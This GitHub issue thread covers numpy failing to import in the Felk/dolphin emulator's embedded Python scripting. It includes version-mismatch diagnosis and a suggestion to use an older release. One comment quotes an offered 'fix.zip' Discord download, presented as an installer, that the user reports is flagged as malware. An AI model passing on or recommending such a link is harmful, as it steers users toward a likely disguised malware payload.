### ISSUE TITLE
Python subinterpreters are still not working, even with the command line option suggested

### ISSUE THREAD

**Issue by 14sirs** [Felk/dolphin#54]
I have used the command line option  --no-python-subinterpreters, as was suggested in order to get numpy to work, but it still ends up breaking the code.
Below shows the code I am running and what happens with and without importing numpy
Without Numpy:
![image](https://github.com/user-attachments/assets/c423f72e-78d0-4717-95a3-a7ced5b58f6a)
With Numpy:
![image](https://github.com/user-attachments/assets/f213f4c8-9e6a-4b99-8dc6-e5790b133e4e)

**Comment by 14sirs** [comment]
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

The link is being flagged as malware, and not being downloaded - Could you relink it somewhere else or something please?=

**Comment by Felk** [comment]
hmm... I can't quite judge from the screenshot, but I suppose with numpy in the imports, dolphin just freezes, correct?

**Comment by 14sirs** [comment]
> hmm... I can't quite judge from the screenshot, but I suppose with numpy in the imports, dolphin just freezes, correct?



> hmm... I can't quite judge from the screenshot, but I suppose with numpy in the imports, dolphin just freezes, correct?

Kind of - it more refuses to run any code as soon as I import numpy - Dolphin itself will still run, but the code input just stops working when trying to import numpy. I've tried using sys to append my normal python running directory, but I still get the same error.

**Comment by 14sirs** [comment]
@Felk I have just thought that it might be because numpy isn't installed to dolphin, but my PC's version of python312. It has also come with stubs in the IDE I am using, and it errors when trying to find these stubs. Would there be a way to install it into the fork of dolphin itself, and if so how? (I've tried using pip to install it to the python312.zip folder, but this just enters the folder instead of installing it)

**Comment by Felk** [comment]
Ahh, yes you're partially right. The problem is most likely that it just doesn't find numpy. If you open a console as described in the readme you should be able to confirm that it's just an ImportError.

As for how to fix that: you can't install numpy "into" dolphin, but you can extend the search path so the embedded dolphin also finds your system installed libraries:

TODO paste link here

**Comment by 14sirs** [comment]
@Felk I have tried doing the sys.path.append(site-packages), and that still yields an error in the dolphin log(as shown below). When I don't use sys, it just says `numpy not found` 
Here is the error I get when using sys:
![My error](https://github.com/user-attachments/assets/901afac4-db46-405a-adb7-e6c30064560d)

**Comment by Felk** [comment]
Yip, although the source code is updated for Python 3.12, the binary I shipped has python 3.11 embedded. Please either building felk/dolphin from source, or install python 3.11 locally. Then install numpy there and append the python 3.11 path. Hope that helps.

**Comment by 14sirs** [comment]
> Hold on, judging from the screenshot your copy of dolphin already has python 3.12. did you already build from source?

Yes, I have built the solution files in the dolphin location after cloning it, as it said to do

**Comment by 14sirs** [comment]
For some reason the version that dolphin is installed with is a python312.zip. I did not add this myself. I have tried reinstalling and rebuilding dolphin too, but that still gives python312. (The "attempts" were where I was trying to add numpy to it)
![image](https://github.com/user-attachments/assets/a22c0e3a-022a-4dfd-bff5-8ba6497e3ed6)

**Comment by 14sirs** [comment]
I used `git clone https://github.com/Felk/dolphin.git` in command prompt in a folder, and then built the solution file using Visual Studio 2022

**Comment by 14sirs** [comment]
@Felk here is a video I created of the issues, and how it runs: https://youtu.be/gQKiAqVstgw

**Comment by Felk** [comment]
Thanks for the patience. I'll have to take a deeper look sometime soon. I hope to catch some motivation next week, but no promises.
As for what steps you've done so far, it seems you did everything right and it's indeed an issue with the python Integration. Sorry for the problems

**Comment by Felk** [comment]
You can try Scripting-Preview 3 and python 3.11 instead. It used to work in the past, so you might have luck with older builds

**Comment by Felk** [comment]
It's in the GitHub repo under tags/releases. Here's a link for you: https://github.com/Felk/dolphin/releases good luck!

**Comment by 14sirs** [comment]
Ok, I'll try cloning that version, I'll let you know if it works for me

**Comment by 14sirs** [comment]
![image](https://github.com/user-attachments/assets/b1f59259-d6e9-44e3-82b0-09e0479a5568)
Slight issue when Building the scripting-preview3 -  I am getting 704 of such errors

**Comment by Felk** [comment]
Please try the precompiled executable that's available for download before trying to build it yourself

**Comment by 14sirs** [comment]
I can't seem to find an exe in the files after cloning it - have I done something wrong?

**Comment by 14sirs** [comment]
Slight issue now whilst trying to run it:
![image](https://github.com/user-attachments/assets/e2226237-7b2d-4850-b4e6-be9db8877580)

**Comment by 14sirs** [comment]
The older version also runs a lot quicker and smoother for some reason @Felk

**Comment by 14sirs** [comment]
I have also noticed that the older version hangs itself whenever you try to output/print too many lines too quickly
